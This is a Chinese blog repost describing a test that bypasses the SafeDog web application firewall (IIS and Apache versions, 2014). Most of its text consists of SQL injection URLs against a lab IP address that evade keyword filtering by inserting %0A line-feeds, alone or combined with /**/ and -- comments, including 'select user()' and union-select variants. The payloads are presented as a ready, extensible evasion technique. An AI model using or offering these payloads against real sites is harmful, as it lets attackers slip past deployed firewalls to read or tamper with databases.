博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
网站安全狗最新版绕过测试
阅读量:6242 次
发布时间:2019-06-22

本文共 830 字,大约阅读时间需要 2 分钟。

测试时间:2014.10.21

测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。

用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。

 

测试详细步骤

常规注入测试:http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user   被拦截,AND作为关键字被识别并拦截。

加入%0A再次尝试:http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

 

成功绕过并实现注入。

 

 

在Apache+php+Mysql环境中:

 

先按常规进行注入尝试:

 

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”    因为and、user()均为黑名单里的关键字所以再次被拦截。

那么我们加入%0A再次尝试:

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

 

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

正常显示,绕过成功。

当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:

http://192.168.91.152:8000/About.php?did=-2%0Aunion–%0Aselect%0Auser()

成功绕过,毫无压力 。

 

版权(STD兄弟连)http://phpsec.sinaapp.com/

 

转载于:https://www.cnblogs.com/hookjoy/p/4043069.html

你可能感兴趣的文章
python里面 循环明细对比 相同人员明细,生成同一订单里面
查看>>
linux top 命令的一些解释
查看>>
前端之HTML内容
查看>>
关于Datagridview控件用法的一些总结
查看>>
Mac 常用设置
查看>>
linux常用命令(22)gzip命令
查看>>
找出一个字符串中第一个只出现一次的字符
查看>>
CSS学习笔记(一)深入理解position属性和float属性
查看>>
xml入门
查看>>
python Flask框架mysql数据库配置
查看>>
[20150529]用户与用户组管理
查看>>
baidu__git_android
查看>>
ZC_源码编译真机烧写_20160424
查看>>
day26-UDP协议无粘包问题
查看>>
使用HTML5的十大原因
查看>>
转发:修饰符
查看>>
【转载】Linux下configure命令详细介绍
查看>>
图片中转站
查看>>
DSP c6678的启动方式
查看>>
【Linux】解决Android Stadio报错:error in opening zip file
查看>>